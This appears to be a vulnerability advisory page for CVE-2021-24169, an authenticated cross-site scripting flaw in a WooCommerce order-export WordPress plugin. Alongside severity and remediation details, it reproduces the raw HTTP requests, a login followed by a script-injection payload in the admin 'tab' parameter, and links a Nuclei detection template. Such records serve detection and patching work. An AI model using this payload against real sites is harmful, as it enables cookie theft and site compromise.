| Title | WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise. |
| Remediation | Fixed in version 3.1.8. |
| CVSS Score | 6.1 |
| EPSS Score | 0.05053 |
| CVE ID | CVE-2021-24169 |
| CWE ID | CWE-79 |
| Tags | cve2021 cve wordpress authenticated wpscan xss wp-plugin wp woo-order-export-lite edb algolplus vuln |
WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.3
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
log=5WcZrf&pwd=IZAOMO&wp-submit=Log+In
GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.12
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24169.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-24169.pcap
N/AN/A